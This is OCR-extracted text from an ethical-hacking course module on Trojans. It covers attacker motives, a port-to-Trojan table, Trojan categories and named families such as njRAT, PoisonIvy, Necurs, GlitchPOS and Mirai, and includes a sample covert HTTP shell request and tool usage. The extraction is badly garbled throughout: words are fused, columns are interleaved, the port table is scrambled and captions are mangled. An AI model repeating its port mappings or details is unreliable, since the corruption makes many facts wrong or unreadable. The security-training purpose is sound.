Attackerscreate maliciousprograms suchas Trojans
forthe following
purposes:
+
Deleteor replace OS'scriticalfiles
*
Generate
fake
traffic
to
perform
Record screenshots,
DoS
andvideoofvictim’s
audio, PC
attacks

+
Use
victim’s
PCfor spammingandblasting
Downloadspyware, adware,
email messages
andmaliciousfiles
Disablefirewallsandantivirus
Createbackdoors
to gainremote access
PCasa proxyserver forrelaying
Infectthe vietim’s attacks
PCasa botnetto perform
Usethevictim’s DDoS
attacks

Steal
sensitive
©
such
as: information
Credit card information,
which is usefulfor domain registration
as well as for
shopping usingkeyloggers
Accountdata such as email passwords, dial-uppasswords,
and web service
passwords
©

Important
Encrypt
company
projects,
including
thevictim'smachine
and
and
presentations
the
prevent victim from
work-relatedpapers
themachine
accessing
Usethe targetsystem
as follows:

ical andCountermensores
Mackin ©by E-Comel
Copyright
 To store archives of illegal
materials,suchas childpornography. The target
continues usinghis/her
systemwithout realizing
that attackersa re usingit for illegal
activities
© AsanFTPserver for pirated software
Script
kiddiesmay justwant to havefun with the targetsystem; an attackercouldplant
a Trojani n the systemjust to makethe systemact strangely (e.g., the CD\DVD tray
andclosesfrequently,
‘opens the mouse functionsimproperly, etc.)
Theattackermight use a compromised systemfor other illegal
purposes suchthat the
targetwould be held responsible if theseillegalactivities are discovered by the
authorities

ical andCountermensores
Mackin ©by E-Comel
Copyright
 CommonPortsused byTrojans

PortTrojan
myno(ias eo se Ina
Trojan
Suse

Cond eater tet GTR ape Hand

Sone. en eae

CommonPortsusedbyTrojans
Portsrepresent the entryandexit pointsof datatraffic.Thereare two typesof ports:hardware
portsandsoftware ports.PortswithintheOSare software ports, andthey a re usually
entryand
exit pointsfor application traffic (e.g.,port 25 is associatedwith SMTPfor e-mail routing
betweenmailservers). Manyexisting portsare application-specific or process-specific. Various
Trojansusesome of theseportsto infecttargetsystems,
Users needa basicunderstanding of the state of an "activeconnection― and portscommonly
usedbyTrojans to determinewhether a system hasbeencompromised.
‘Among
the various states, the “listening―
state is the important one i n thiscontext. Thesystem
generates this state when it listensfor a portnumberwhile waiting to connect to another
system, Whenevera system reboots, Trojans move to the listening state;some usemore than
data
one port:one for
Trojans
andthe other(s)
are listedi n the tablebelow.
for
by
transfer.Commonportsused different

Port Trojan Port Trojan

2
Death | 5001/5050SocketsdeTroie

443Emotet
20/22/80/

21/3024)Wincrash
| 5321 FireHoteker
BladeRunner/Blade

|
4092/5742
|
BladeRunner,DolyTrojan,
InvisibleFTP,
WebEx,
Fore,
WinCrash,
5400-02

Robo-Hack
Alpha
gunner 0.80

DarkFTP

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Shaft, LinuxRabbit
SSHRAT,

TinyTelnetServer,EiteWrap
EmailPasswordSender,
‘Antigen,
Terminator,
WinPC, WinSpy, Haebu
Coceda,ShtrilitzStealth,Terminator, kilerRat,HoudiniRAT
Kuang20.17A-0.30,Jesrto, Lazarus
Group,Mis-Type, NightDragon
26 BadPatch
|
6667/12349Bionet,Magic
Hound

|
31/456 HackersParadise

Denis,
Ebury,FIN7,LazarusGroup,
6670-71
| Deepthroat

53 Threat Group-3390,
RedLeaves,
Trooper
Tropic GateCrasher,
Priority

Mspy RemoteGrab

Necurs, Ismdoor,
NetWire, PoisonIvy,
Executer,
Codered,APT18,APT19,APT
32,BBSRAT,Calisto,
Carbanak,Carbon,
Comnie,Empire,FIN7,
InvisiMole, NetMonitor
LazarusGroup,MirageFox,
Mis-Type,
Misdat,
Dragon,
POWERSTATS,
ThreatGroup-3390,
Type,
Night
Mivast,MoonWind,
RedLeaves,
5
UBoatRAT

Shiver 7300/3138,
131339
Nuker,Dragonfly
2.0, 7397

TCP
Wrappers Trojan 7626

APT
APT
3,
‘ADVSTORESHELL, 29,
33,AuditCred,BADCALL,
APT
BBSRAT,
Comnie, Cardinal
RAT,
Bisonal,Biba, Carbanak,
Derusbi,ELMER,
Empire
FIN7,
FINS,
FELIXROOT,
HARDRAIN,Hi-Zor,
KEYMARALE,
ghOst
RAT,
HOPLIGHT,
LOWBALL,
LazarusGroup,
Misdat,
Mis-Type, MoonWind,Naid,
Nidiran,
Pasam,PlugX,PowerDuke,
POWERTON, Proxysvc,
RATANKBA,

5-Type,
,Threat
RedLeaves, TEMP.Veles
‘Group-3390, Tropic
TrickBot, Trooper,
TYPEFRAME, UBoatRAT

7
Module 862
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 Petya,Dragonfly
WannaCry, 2.0 lekiller

HackersParadise BADCALL,
Comnie,
Volgmer
IniKiller,
PhaseZero,StealthSpy Ptakks

Zeus,
APT 37,Comnie,
EvilGrab,FELIXROOT,
FIN7,HTTPBrowser,
SatanzBackdoor,Ripper LazarusGroup,
Magic
Hound,Oceansalt,S
Type,
Shamoon,
Volemer
TYPEFRAME,

1001 Silencer,
WebEx 8443 Nidiran,
FELIXROOT,
TYPEFRAME
1011 DolyTrojan 8787/54321BackOfrice
2000

1026/ RSM 9989 iINiKiller

64666
1095-98 RAT 10048 Delf

1170 Psyber
StreamServer,
Voice 10100 itt

77 njRAT 10607 Coma1.0.9

1234 UltorsTrojan 11000 SennaSpy

1234/
12345
1243
Valvo line

SubSeven10-1.8
11223

12223,
Progenic
Trojan
Hack’99
KeyLogger
1243/6711
16776/273SubSeven 12345-46 GabanBus,
NetBus
â„¢

1245 VeoDo0Doll 12361, Whack-a-mole

12362

wm Agent.BTZ/ComRat,
JavaRAT, Adwind 16969 Priority
RAT

1349 BackOfficeDLL 20001 Millennium

1492 Frp9acme
NetBus
2034/1120 NetBus 2.0,
2.01,
Beta

1433 Misdat 2asaa GirlFriend1.0,Beta-1.35

ical andCountermensores
Mackin ©by E-Comel
Copyright
 1600 Shivka-Burka 22222/ Prosiak
33333

1608 HeliSpy
DarkCometRAT,PandoraRAT,
22222 Rux
Rae

1807 SpySender 23432

Asylum
1863 XtremeRAT 23456 EvilFTP,
UglyFTP
1981

1999
Shockrave

BackDoor1.00-1.03,
25685

26274
‘Moon
Delta
Pie

2001 Trojan
Cow 30100-02 NetSphere
1.27a

2115 Bugs 31337-38 Back

Orifice/
1.20/Deep
BackOrifice
BO
2140
The Invasor 31338 DeepBo
2140/3150
2155
Deepthroat
Ilusion Mailer,Nirvana
31339

31666
‘NetSpy
Dk

80Whack

2801 Phineas
Phucker 34324 BigGluck,
TN

3129 MastersParadise 40412 The Spy

3131
Subsari 4082126 MastersParadise

3150

3389
The
ROP
Invasor 4762

50766
betta

Fore

3700/9872- RemoteWindows
9875/1006Portalof Doom Shutdown
7/0167
4000 RA .69-1.11/
SchoolBus

4567

4590
File Nail

Icatrojan
Telecommando
Devil

5000 Bubbel,
SpyGate
RAT,PunisherRAT
Table72:
Trojan
andcorresponding

ical
port ofstack

andCountermensores
Mackin ©by E-Comel
Copyright
 of Trojans
Types
1@Trojansae
categories
according
to thelrfunctioning
andtargets
(©Some
ofthe
example
includes:

Eh tects
ccs Td
ans rene jas
Software
Security
Se sete

of Trojans
‘Types
Trojan
are classified depending
into many categories o n the exploit
functionality
targets.Some
Trojans
types a re listedbelow:
1. RemoteAccess Trojans
Backdoor Trojans
Botnet Trojans
RootkitTrojans
E-BankingTrojans
Trojans
Point-of-Sale
Defacement Trojans
ServiceProtocolTrojans
MobileTrojans
loTTrojans
Software
Security Trojans
Disabler
Trojans
Destructive
DDoSAttackTrojans
Command ShellTrojans

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Trojans
RemoteAccess
Remoteaccess Trojans(RATs)
provide attackerswith full control over the victim’s
system,
thereby
enabling themto remotely
access files,private
conversations, accounting data,etc. The
RATacts as a server and listenson a port that is not supposed to be availableto Internet
Therefore,
attackers. if the user is behinda firewallon the network,
attackerwill connect to the Trojan.
can easily
access Trojans.
Attackers
its less
likely
thata remote
in the same networklocatedbehindthe firewall

For example,Jasonis an attacker

who intendsto exploitRebecca's to stealher data
computer
JasoninfectsRebecca'scomputer with server.exe and plants Trojan.
a reverse connecting The
Trojanconnects throughPort 80 to the attacker, establishing
who is locatedi n Russia, a reverse
connection. Now,Jasonhascomplete controlover Rebecca's machine.

Ain (comple
@ @
Sitting Russfabecca
Jasonattacker

acento
the
syatamVictim
with
RAT
2 sear gi n 109%
fected
7.3:Working
Figure ofRemote
Access
Trojan
Trojan
Attackersuse RATsto infectthe targetmachineto gain administrativeaccess. RATshelpan
attackerto remotely access the completeGUI andcontrolthe victim’s
computer withouthisor
her awareness. Moreover, theycan perform s creen andcamera capture, codeexecution,
keylogging,file access,password sniffing,
registrymanagement, and so on. Theyinfectvictims
Via phishingattacksanddrive-by andthey
downloads, propagatethrough infectedUSBkeys or
networked drives. Theycan download and execute additional malware, execute shell
commands, readandwrite registrykeys,capturescreenshots, logkeystrokes, and spy on
webcams.
=
njRaT
a
njRAT
is
it can
powerful
access a
data-stealing
RATwith

downloadingperforming
files,
capabilities.
to
In addition logging
keystrokes,
credentialsstoredi n browsers,
victim'scamera, stealing
process and file manipulations,
uploadingand
andviewingthevictim's
desktop,
ThisRATcan be usedto controlbotnets(networks of computers),thereby allowing
the
attackerto update,uninstall,
disconnect, restart,and closethe RAT,and rename its
campaign ID. The attackercan further create and configure the malwareto spread
throughUSBdrives withthehelp of thecommand-and-control server software.
Features:
© Remotely
access
the victim’s
computer
Collectvictim'sinformationsuchas IP address,
hostname,
andOS.
Manipulate
filesandsystemfiles

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Open
a nactive theattacker
remote sessionproviding accessto thecommand
lineof
the victim'smachine
>
Logkeystrokes
andstealcredentialsfrombrowsers,

74: ScreenshotofniRAT
Figure
Someadditional a re as follows:
RATS
=
FlawedAmmyy
=
MoSucker
=
ProRat
=
Theet
=
Ismdoor
=
KediRAT

PCRat/
GhOst
=

Backdoor Trojans
RAT

‘A bypass
backdoor
is a programthat can thestandardsystemauthenticationor conventional
systemmechanisms suchas IDSand firewalls, without beingdetected.In these typesof
breaches, leverage
hackers backdoorprogramsto accessthevictim’s
computeror network.The
differencebetweenthis typeof malwareandother typesof malwareis that the installationof,
the backdooris performed knowledge.
withoutthe user’s Thisallowsthe attackerto perform
any activityon the infected computer,suchas transferring, modifying, or corrupting files,
installing
malicioussoftware, and rebootingthe machine,without user detection.Backdoors
are usedbyattackersfor uninterrupted
accessto the targetmachine,Mostbackdoors a re used
for targetedattacks.BackdoorTrojans are often usedto group victim computers to form a
botnetor zombienetworkthat can beusedto perform criminalactivities.
BackdoorTrojans
are often initially
usedi n the second(point
of entry)or third (command-and-
stageof the targeted
control[C&C]) attackprocess.Themain differencebetweena RAT anda

ical andCountermensores
Mackin ©by E-Comel
Copyright
traditionalbackdoor
is that the RAThasa user interface,
i.e. the clientcomponent,
whichcan
be used by the attacker to issue commandsto the server component residing
i n the
compromised machine, whereas a backdoordoesnot
Forexample,
network.Thehackerimplants
the backdoor
is
a hackerwho performing a malicious
identifies
activity
vulnerabilitie
a
the networkmonitor.exebackdoori n the target
will be installedin a victim’s
in target
network,
machineon the targetnetworkwithout being
and

detectedbynetwork security mechanisms. Once installed, networkmanitor.exewill provide

the attacker
withuninterrupted accessto the victim'smachineandthe targetnetwork.
+
Poisonivy
Poisonivy
gives the attackerpractically complete controlover the infectedcomputer.
The Poisonivy remote administration tool is createdand controlledbya Poisonivy
management program or kit. ThePoisonivy kt consistsof a graphical
user interface,
and
are small(typically,
thebackdoors <10kB)
Oncethe backdooris executed,
it copiesitselfto either the Windowsfolderor the
Windows\system32
folder.Thefilenameandlocationsof the backdoora re definedby
thecreator ofthebackdoor kit to
whenusingthe Poisonlvy create the server program.

A registry
can
Somevariants of Poisonivycopy themselves
into an alternatedatastream:
entryof the backdoorwill be addedto ensure that the backdooris started
every time the computer is bootedup. The server then connectsto a client usingan
addressdefinedwhenthe server partwas created.Thecommunication betweenthe
server andclientprograms i s encrypted
andcompressed. can beconfigured
Poisonlvy to
injectitself into a browserprocess before making connection to bypass
an outgoing
firewalls
Features:
© Filemodification,
deletion,
andtransferto andfromthe infectedsystem
Windowsregistry
can beviewedandedited

Currently can beviewedandsuspended

runningprocesses or killed
Currentnetworkconnectionscan beviewedandshutdown
c an beviewedandcontrolled(e.g.,
Services stopped
or started)
Installeddevicescan beviewedandsome devicescan bedisabled
Thelistof installedapplications
can be viewed,
entries can be deleted,
or programs
can beuninstalled
‘Accesses
Windowscommandshello n the infectedcomputer
Stealsinformationbytaking and recording
of the desktop
screenshots audio or
webcamfootage
savedpasswords
Accesses andpassword
hashes

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Fire 75:Serenshtof Potsony

Someadditional are as follows:

backdoorTrojans
+
Kovter
+

+
POWERSTATS
ExtraPulsar
va
=
RogueRobin
+
Servielper
linux
+
SpeakUp backdoor
backdoor
+
Winnti

Botnet
Today,
Trojans
most majorinformation securityattacksinvolvebotnets.Attackers (also
knownas “bot
herders―)
use botnet Trojans to infect a largenumberof computers throughout
a large
geographical
area to create a networkof bots(ora “botherd―)
that can achieve
controlvia a
command-and-control (C&C) center. They trick regular
computerusers into downloading
Trojan-infected through
filesto theirsystems phishing,
SEOhacking,
URLredirection,
etc. Once
the user downloadsand executes this botnet Trojan i n the system, it connects backto the
attackerusingIRC channelsandwaits for further instructions,Some botnetTrojans alsohave
worm featuresandautomaticallyspread to other systems in the network.They helpan attacker
to launchvarious attacksandperform nefariousactivities suchas DoSattacks, spamming, click
fraud,
and
theft ofapplication
serialnumbers,
IDs,
login and
credit cardnumbers.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Figure76: ofGotnet
Functioning
Necurs
TheNecursbotnet is a distributorof many piecesof malware, most notably Dridexand
Locky. It deliverssome oftheworst bankingTrojansandransomware threatsi n batches
of millionsof emailsat a time, and it keeps itself.Necursis distributedby
reinventing
spame-mailsanddownloadablecontent from questionable/illegal sites. It is indirectly
responsible
Features:
a
for significant
portionof cyber-crime.

>
Destruction of the system
© a PCinto a spyingtool
Turning
©

money
theft
Electronic
and
Botnet mining
Serving
as a gateway for otherviruses

Necurs Botnet -
Email
Spam

Figure77:Screenshot
showing
Necus
spam
for2
ical
email

Mackin
wicking victim

andCountermensores ©by E-Comel

Copyright
Someadditional
botnetTrojans
are as follows:
=
Electrum
=
Satori
Torii
botnet
=
Qakbot
=

=
n
Hide Seek
Ramnit
=
Panda
=
BetaBot
=
Cridex
RootkitTrojans
As the name indicates, “rootkit―
consists of two terms,i.e., “root―
and “kit.―
“Root―
is a
UNIX/Linuxterm that is the equivalent of “administrator―
i n Windows. Theword “kit―
denotes
programsthat allowsomeone to obtainroot-/admin-level accessto the computer byexecuting
the programsi n the kit. Rootkitsare potent backdoorsthat specificallyattackthe root or OS.
Unlike backdoors, rootkits cannot be detected byobserving services, systemtask lists,or
registries. Rootkitsprovide full control of the victim OS to the attacker.Rootkitscannot
propagate bythemselves, and thisfact hasprecipitated a greatdealof confusion. In reality,
rootkits are just one componentof what is calleda blendedthreat. Blendedthreatstypically
consistof three snippets of code:dropper, loader, androotkit.Thedropper is the executable
the dropper
programor file that installsthe rootkit. Activating programusually entailshuman
intervention,suchas clicking on a maliciouse-maillink, Onceinitiated,
the dropper launches
the loaderprogram and then deletesitself.Onceactive,the loadertypically causes a buffer
overflow,whichloadsthe rootkit into memory.
=
EquationDrug Rootkit
EquationDrug
is a dangerous rootkit that attacksthe Windowsplatform.
computer It
performs targetedattacksagainstvarious organizations
andlandson the infected
systembybeingdownloadedand executedbythe Tricklerdubbed"DoubleFantasy,"
coveredbyTSL20110614-01(Trojan.Win32.Micstus.A).
It allowsa remote attacker
to
execute shellcommandson theinfectedsystem,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 orvterath
ye Leverem

a)
tne

Someadditionalrootkit Trojans
are as
showing
gure78 Screenshot start of

follows: EquationDrug
Rootkit

+
cEIDPagetock
+
Wingbird
+
GrayFish
+
Finfisher
+
ZeroAccess
+
Whistler
E-banking Trojans
E-banking Trojans are extremely dangerous andhaveemerged as a significant
threat to online
banking. They interceptthe victim'saccount informationbeforethe system can encrypt it and
sendit to the attacker'scommand-and-control center. Installationof theseTrojanstakesplace
on the victim'scomputer whenhe or sheclicksa maliciousemailattachmentor a malicious
advertisement. AttackersprogramtheseTrojans to steal minimum and maximum monetary
amounts,so that theydo not withdrawall the money i n the account, thereby avoiding
suspicion. TheseTrojans also create screenshots of the bankaccount statement,s o that the
victim thinksthat there is no variation i n his/her
bankbalanceand is not aware of this fraud
unlesshe/she checks the balancefromanothersystem or an ATM,TheseTrojansmayalsosteal

ical andCountermensores
Mackin ©by E-Comel
Copyright
victims’
data suchas creditcard numbersandbilling
details,
and transmit them to remote
hackersv ia email,FTP,
IRC,
or othermethods,

o>

of
WorkingE-banking Trojans
Figure
79:Working
€
of Banking
Tojan

A banking is a to obtain personal

Trojan maliciousprogramthat allowsattackers information

Theworking
of
aboutusers online banking
of a banking
andpayment
Trojan
includes
t
systems.
he following:
‘+
TAN Gabber:A Transaction AuthenticationNumber(TAN) is a single-use
password for
authenticating
online banking transactions. Banking
Trojans interceptvalid TANS
enteredbyusers and replace
themwith randomnumbers.The bankwill reject
such
invalid randomnumbers. Subsequently,
the attacker
misusesthe intercepted
TANwith
the target's
login
details
HTML Injection:The Trojan creates fake form fields on e-banking pages,thereby
enabling
account
details,
the attackerto collectthe target’s creditcardnumber,
birth,etc. The attacker can use this informationto impersonate
compromise his/her
account.
dateof
the targetand

FormGrabber:A form grabber is a typeof malwarethat captures a target's

sensitive
datasuchas IDsandpasswords, froma webbrowserformor page.It is an advanced
methodfor collecting the target’s Internet bankinginformation.It analyses POST
requests and responses to the victim'sbrowser.It compromises the scramblepad
authenticationand intercepts the scramblepadinput as the user enters his/her
Customer NumberandPersonal
AccessCode.
Covert Credential Grabber: Thistypeof malwareremains dormantuntil the user
performs an online financialtransaction. It workscovertlyto replicate itself on the
computer and editsthe registry entries eachtime the computer is started. TheTrojan
alsosearchesthe cookiefiles that had beenstoredon the computer while browsing
financialwebsites.Once the user attempts to makean online transaction,the Trojan
covertlystealsthe logincredentialsandtransmits themto the hacker.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 methodsusedbybanking
‘Some to stealusers’
Trojans information
are as follows:
© Keylogging
Formdatacapture
fraudulentformfields
Inserting
andvideorecording,
Screencaptures
financial
Mimicking websites
© Redirecting
to banking
websites
© Man-in-the-middle
attack
E-banking Dreambot
Trojan:
banking
Dreambot are alsoknown as updated
Trojans versions of Ursnifor Gozi
DreambotTrojans have longbeen used byhackers, and theyhave been regularly
updated
withmore sophisticated capabilities.
They can be deliveredthrough the Emotet

document
machine,
or
dropper RIGexploit kit. ThisTrojan

it will covertly
can alsobeembedded

keys
create registry and processes,
as a macro i n an MSword
andsent to victims via spamemails.if this Trojan getsinto the victim's
and attemptto connect to
multiple
maliciousC2Cservers.

720: HTTPS
Figure to maicous servers
requests
to the C2Cserver, it will perform
Afterconnecting keylogging
andsendthe keylog
data
to the attacker.This keylog
data can include passwords
of banking
websites,
OTP
messages,
secure
transaction passwords, pins,etc.

Modul
7 875
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
 File EditSearchView Encoding
Language
Settings
MacroRun Plugins
Window?

a
688 oa)
13[a 4/4
Torose7eoseeeseseon
05-2018 13241322
4G 1 KOBE

Blank net Ext

2\PE xplore.ex
Blank

relatedwith the
Program
keylogs
pad++.¢

e-banking
Someadditional
7.1;
Figure Screenshotof reambot

are follows:
Trojans
as
Banking
Trojan
—keylog
data
+
Emotet
+
PandaBanker
+
Ramnit
+
zeus
+
Dridex
+
UrizoneBanker
Trojans
Point-of-Sale
As the name indicates, point-of-sale
(POS)
Trojansare a typeof financialfraudulentmalware
that targetPOSand payment equipmentsuchas creditcard/debitcardreaders.Attackers use
POSTrojans to compromise suchPOSequipment and grabsensitive informationregarding
credit cards, suchas creditcardnumber, holdername, andCW number. SincePOSplays a
criticalrole in the retail industry,
theseTrojans
will havea greaterimpacto n retail businesses
andretailcustomers.Themagnetic namely
stripeon a creditcardconsistsoftwo tracks, called
TRACK1 Theseare criticalfor completing
and TRACK2. the transaction usinga POSdevice.
Track andTrack2comprisecriticalinformation
relatedto the creditcard. Once a POSTrojan

ical andCountermensores
Mackin ©by E-Comel
Copyright
affects andcompromises a POS device, to grab
it attempts theTRACK1 andTRACK2 information
he/she
of the cardthat is insertedi n the device.Oncethe attackeracquires this information,
fullcontrolofthecardandcan easily
‘gets performfinancial
fraud,
=
GlitchPos
popularly
It is knownas GlitchPOS.A. GlitchPOS
is a fake cat game that is embeddedi n

malwarenot execution.
and displayed
as
a
at the time of
cat game. Whenany victim installsthe cat game, the Trojan
background. by grab
GlitchPOS
is used attackers
to
thatmasquerades
It is a Trojan
will be executedi n the
thecreditcardinformation
of the
has becomethe most notorious financialTrojan,
victim, GlitchPOS and its adverse
effectshave spreadacross the globe.
To stealthe creditcardinformation,
this Trojan
searches
for theTrack1andTrack2detailsin the memorypagesof devices.

=
®
Blaves
rate

3 newgiene
Lond ResourcesViewer

hd
@

=
in
oat
id oxme

B Gamera
rePath 009)

ath
reP 5939
BBGameaehfessot
GamePath
fre LEE

Game?
ath
GamePath
26FOA
2792
BBGamera rc9ct
BhGamersen
BE
GameP
tree
a fre39090
BBGamera 00%
1 eat
BBGameahtoestc2
HAGamePath foes
sas

figure 7.2:Screenshot
of Trojan
GtchPOS
SomeadditionalPOSTrojans
are as follows:
+
LockPos
+
BlackPos
+
Fastpos
PunkeyPOS
CenterPos
MalumPos

Module
7 877
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Defacement
Trojans
DefacementTrojans,once spread can destroy
over the system, or changethe entire content of
a database.However, theyare more dangerous when attackerstargetwebsites, as they
physically
changethe underlyingHTMLformat, resultingin the modificationof content. In
significant
addition, lossesmay be incurreddue to the defacementof e-business targets by
Trojans.
editorsallowone to view, edit,extract,
Resource and replace bitmaps,
strings, logos, andicons
fromanyWindows program.They allowviewingandeditingof nearly of a compiled
any aspect
Windowsprogram,frommenus to dialog
boxesand icons,etc. They
employ
user-styled
custom

(UCAs)
applications to
deface
Windows
applications.
Standard

s
2

Originalc okexe
cae
one Detaced

Restorator
Figuce showing
733Screenshot
defaced aplestin
alex

Source:http://www.bome.com
Restoratoris a utilityfor editingWindowsresources i n applications and their
components (e.g,fileswith .exe, .dll,.res, .rc,and .derextensions).
It allowsyou to
add,or remove resources suchas text, images,icons,sounds,
change, videos, versions,
dialogs,
and menus i n nearlyall programs. Usingthis tool, one can achieve
translation/localization, design
customization, improvement,anddevelopment.
Features:
applications
Translateexisting (localization)
Customize
thelookandfeelof programs
Replace
logos
andicons (branding)
controlover
Enhance resource filesi n development
thesoftware process
ofapplications
Hackinto the inner workings on the computer

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Figure showing
714:Screenshot Rest
ServiceProtocolTrojans
‘These
Trojanscan take advantageof vulnerableservice protocols
suchas VNC,HTTP/HTTPS,
andICMP,to attackthevictim'smachine.
=
VNCTrojans
VNCTrojan
‘A starts a VNCserver daemoni n the infectedsystem (victim),whereby the
attackerconnects to the victim usingany VNC viewer. Sincethe VNC programis
considereda utility,thisTrojan
will bedifficult to detectusingantivirus software.Well
knownfinancialmalware
suchas Dridex,
Neverquest,andGoziemploy a hiddenvirtual
networkcomputing(HVNC)module,whichallowsattackersto gain user-grade
access to
an infected
PC.

Vietim
Figure7.25:
Working
of VNCTrojan

ical andCountermensores
Mackin ©by E-Comel
Copyright
HTTP/HTTPS
Trojans
HTTP/HTTPS
Trojans can bypassany firewall and work in reverse, as opposed to a
straight
HTTP tunnel. They
use web-based interfacesand port 80. The execution of
these Trojans takes placeon the internal host and spawnsa child programat a
predetermined time. Thechild programis a user to the firewall; hence, the firewall
allowsthe programto accessthe Internet.However, thischildprogramexecutesa local
shell,connects to the webserverthat the attackerowns on the Internet through an
apparently legitimate HTTPrequest,andsendsit a readysignal. The apparently
legitimateanswer fromthe attacker'sweb server is, i n fact,a series of commands that
thechildcan execute on themachine’s
localshell,Theattacker
converts all thetraffic
into a Base64-like
structure andgives it as a valuefor a cgi-stringto avoiddetection.
Thefollowing
is an example
of a connection:
Slave:GET/cgi-bin/order?
MSmAe}TgZdgYOdgIO0BqFFVYTg}FLdgxEdbive7kr} HTTP/1.0
Masterreplies with: g5mAlfbknz
TheGETof the internalhost(SLAVE) is the command promptof the shell;theanswer is
an encoded “1s―
commandfromthe attacker on the external server (MASTER). The
SLAVE
spawned
tries to connect to the MASTER
if the shellhangs; at
daily a specified time. If necessary,the childis
the attackercan checkand fix it the next day.If the
administratorsees connectionsto theattacker'sserver andconnectsit to his/her server,
he/she justsees a brokenweb server because thereis a token(password) i n the
encodedcgi GETrequest. Support for W W Wproxies(e.g., Squid, a fullyfeaturedweb
proxy cache) is available.The programmasksits name i n the processlisting. The
are
programs reasonably
per file. Usage
slave―
on the SLAVE,
small;the master andslave
is easy:edit rwwwshell.pl
and run “rwwwshell.pl―
programs
on the MASTER
consistof only260lines
for the correct values, execute “rwwwshell.pl
just beforethe slavetries
to connect.
HTTPrequest
to

Trojanpassesthrough
HTTPreply
716: Working
Figure of HTP Trojan
0 SHTTPD
SHTTPD i s a smallHTTP server thatcan beembedded insideanyprogram.It can be
wrapped with a genuine program(game chess.exe).
Whenexecuted,i t will turn 2
computer into an invisiblewebserver. Forinstance,an attackerconnects to the
victim usingwebbrowserhttp://10.0.0.5:443 andinfectsthevictim’s
computer with
cchess.exe, with Shttpdrunningi n the background
andlistening 443 (SSL).
on port

ical andCountermensores
Mackin ©by E-Comel
Copyright
2

attacker
Normally
Firewall
you
throu
port
1: 10.0.05:483
a
allows

7.7: SHTTPD
Figure
=)
rented
rote

attackprocess
tateTt victim
1p:10.0.0.8:443

o HTTPRAT
HTTP RAT uses web interfacesand port 80 to gain access. It can be understood
simply
are
as an HTTPtunnel,
comparatively
more dangerous
Internetcan beaccessed,
as theywork nearly
ubiquitously
wherethe These
exceptthat it worksi n the reverse direction. Trojans

Features
(© Displays data/keystrokes,
adsandrecordspersonal
unsolicitedfilesanddisablesprograms/system
Downloads
FloodsInternet connection anddistributes
threats
Tracksbrowsing
activities andhijacks
Internetbrowser.
Makesfraudulentclaimsaboutspywaredetectionandremoval

ICMPTrojans
7.18:
Figure
of TP RAT
Working Troan

The Internet ControlMessage Protocol(ICMP)is a n integralpartof IP,and every IP

modulemust implement protocol
it. It is a connectionless that provides error messages
TheICMPprotocol
to unicastaddresses. encapsulates the packetsi n IPdatagrams.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 attackercan hidethe data usingcovert channels
‘An methodsi n a protocol that is
undetectable.Theconceptof ICMPtunneling allowsone protocol to be carriedover
anotherprotocol. ICMPtunneling uses ICMPechorequest andreplyto carrya payload
andstealthily
access or controlthe victim’s
machine.Attackerscan use the dataportion
of ICMP_ECHO and ICMP_ECHOREPLY packets for arbitrary informationtunneling,
Networklayer devicesandproxy-based firewallsdo not filter or inspectthe contents of
making
traffic,
ICMP_ECHO theuse ofthischannel
attractive to hackers.
Attackerssimplypass,drop,
or return the ICMPpackets.TheTrojan themselves
packets
masquerade as common ICMP_ECHO traffic.The packets
can encapsulate
(tunnel)
any
required
information.
owe
cont ICMP
Trojan:
fempsendHOME
Server
comme
lg

Mobile Trojans
Figure
719:Working
of CMP
Trojan
Mobile Trojans are malicioussoftwarethat targetmobilephones. Mobile Trojanattacksare
increasingrapidly due to the global proliferation
of mobile phones.The attackertricksthe
victim into installing
the maliciousapplication.
Whenthe victim downloadsthe maliciousapp,
the Trojan performsvarious attackssuchas banking credentialstealing,
socialnetworking
credentialstealing,
dataencryption, anddevicelocking,
+
BasBanke
BasBanke is a Trojanfamilythat runs on Android.TheTrojan was firstidentified i n 2018
during over 10,000
the Brazilianelections,registering installationsas of April2019from
theofficialGoogle
will perform
card andfinancial
Storebanking a
Play alone.Itis a
keystrokelogging,screen recording,
andwhenit infectsdevice,
Trojan,
SMSinterception,
information.To trick users into downloading
it
and theft of credit
thisTrojan, the Trojan
creators advertisedit via WhatsApp and Facebookmessages. Themost widely spread
and downloadedmaliciousversion of BasBankeis the fake CleanDroid
Android app.
CleanDroid itselfas a mobilejunkcleaning
projects andmemoryboosting app;however,
itis actually
a banking
Trojan.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 = Cleandroid
Gio pen

Figure720:Screenshot
ofBasBanke
MobileTrojan
SomeadditionalmobileTrojans follows:
are as

Smith
Agent
Hiddad
AndroRAT
Rotexy
Gplayed
Asacub
Gustuff
Trojans
WoT
Internetof things
items embedded
Trojans
‘These
(IoT)refersto the inter-networking
with electronics.
leverage
loT Trojans of
physicaldevices,
are malicious programs
a botnetto attackothermachines
buildings,
outsidetheloTnetwork.
andother
that attackloT networks.

Mirai
Mirai is a self-propagating loT botnetthat infectspoorly protectedInternet devices(loT
devices). Mirai uses telnet port (23or 2323) to findthosedevicesthat are still using
thelr factory default username and password. Most loT devicesuse defaultusernames
and passwords. Mirai can infectsuchinsecure devices(bots) and co-ordinate them to
mount a DDoS
attackagainst
a chosen
victim.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Feature
Login attemptswith60differentfactory
defaultusernameandpassword
pairs
© Builtfor multiple
CPUarchitectures(x86,
ARM, Sparc,PowerPC,
Motorola)
>

Connects
to attacker
specify
attack
to C&C allowthe
bandwidth
Increases usageforinfected
bots
to an vector

Identifiesandremoves competing
malware
© Blocksremote administrationports

sed MDby

cunt? Registerat wmelrooted,

com

Prevention:
ure 7.21:
Screenshot
displaying MialD oS atack
botnetTrojan

Using softwareand updating

anti-Trojan usernames andpasswords
can prevent
Mirai DDoSbotnetTrojan attacks.
SomeadditionalloT Trojans
are as follows:

+
SilexBrickerBot
+
Satori
+
Toriibotnet
MioriloT Botnet
Bashlitelot Malware
Gafgy
Botnet

7
